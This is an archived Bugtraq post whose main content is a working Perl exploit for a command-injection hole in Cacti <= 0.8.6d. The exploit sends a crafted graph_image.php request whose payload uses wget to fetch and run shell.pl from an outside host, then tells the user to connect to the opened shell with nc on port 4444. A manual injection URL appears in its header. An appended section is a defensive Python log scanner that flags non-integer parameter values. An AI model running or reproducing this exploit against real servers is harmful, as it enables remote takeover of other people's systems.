[39259] in bugtraq


Remote Command Execution Exploit for Cacti <= 0.8.6d

daemon@ATHENA.MIT.EDU (Alberto Trivero)
Thu Jun 23 11:45:42 2005

Message-ID: <007301c57753$5ab17f60$0100a8c0@alberto>
From: "Alberto Trivero" <trivero@jumpy.it>
Cc: <vuln@frsirt.com>, <submit@milw0rm.com>,
        <submissions@packetstormsecurity.org>, <news@securiteam.com>,
        <bugtraq@securityfocus.com>
Date: Wed, 22 Jun 2005 19:53:53 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0070_01C57764.1DCC9970"

This is a multi-part message in MIME format.

------=_NextPart_000_0070_01C57764.1DCC9970
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

#!/usr/bin/perl
#
# Remote Command Execution Exploit for Cacti <= 0.8.6d
#
# This exploit opens a remote shell on targets that use Cacti
# TARGET HOST MUST BE A GNU/LINUX SERVER, if not:
# manual exploiting --> http://www.example.com/cacti/graph_image.php?local_graph_id=[valid_value]&graph_start=%0a[command]%0a
# Patch: download the last version http://www.cacti.net/download_cacti.php
# Discovered and Coded by Alberto Trivero

use LWP::Simple;

print "\n\t===============================\n";
print "\t= Exploit for Cacti <= 0.8.6d =\n";
print "\t=      by Alberto Trivero     =\n";
print "\t===============================\n\n";

if(@ARGV<2 or !($ARGV[1]=~m/\//)) {
   print "Usage:\nperl $0 [target] [path]\n\nExamples:\nperl $0 www.example.com /cacti/\n";
   exit(0);
}

$page=get("http://".$ARGV[0].$ARGV[1]."graph_view.php?action=list") || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/local_graph_id=(.*?)&/ || die "[-] Unable to retrieve a value for local_graph_id";
print "[~] Sending exploiting request, wait for some seconds/minutes...\n";
get("http://".$ARGV[0].$ARGV[1]."graph_image.php?local_graph_id=$1&graph_start=%0acd /tmp;wget http://albythebest.altervista.org/shell.pl;chmod 777 shell.pl;perl shell.pl%0a");
print "[+] Exploiting request done!\n";
print "[*] Now try on your box: nc -v $ARGV[0] 4444\n";

------=_NextPart_000_0070_01C57764.1DCC9970--
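
A defender's view of the request format given in the script's header comment, as an added example that is not part of the original post: a web-log check that flags graph_image.php requests whose local_graph_id or graph_start value is not a plain integer. The log lines are constructed, and treating legitimate values as optionally signed integers is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined format); addresses and values are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Jun/2005:19:40:01 +0200] "GET /cacti/graph_image.php?local_graph_id=3&graph_start=1119400000 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [22/Jun/2005:19:53:53 +0200] "GET /cacti/graph_image.php?local_graph_id=3&graph_start=%0aCOMMAND_PLACEHOLDER%0a HTTP/1.1" 200 0',
    '192.0.2.77 - - [22/Jun/2005:19:54:10 +0200] "GET /cacti/graph_image.php?local_graph_id=3&graph_start=1119400000%0A HTTP/1.1" 200 0',
    '192.0.2.10 - - [22/Jun/2005:19:55:00 +0200] "GET /cacti/graph_view.php?action=list HTTP/1.1" 200 900',
]

REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')
NUMERIC_PARAMS = {"local_graph_id", "graph_start"}  # parameters named in the post
INTEGER = re.compile(r"-?[0-9]+")  # assumption: legitimate values are plain integers


def suspicious_params(log_line):
    """Return [(name, decoded_value)] for graph_image.php parameters that are not integers."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/graph_image.php"):
        return []
    hits = []
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        # fullmatch, not match with "$": "$" also matches before a trailing "\n",
        # which would let a value such as "1119400000%0a" through.
        if name in NUMERIC_PARAMS and not INTEGER.fullmatch(value):
            hits.append((name, value))
    return hits


def scan(lines):
    """Map line index -> offending parameters for every flagged line."""
    flagged = {}
    for i, line in enumerate(lines):
        hits = suspicious_params(line)
        if hits:
            flagged[i] = hits
    return flagged


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(idx, [(n, repr(v)) for n, v in hits])
```

The same integer-only rule, applied server-side before the value is used, is the input validation that this request format bypasses.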

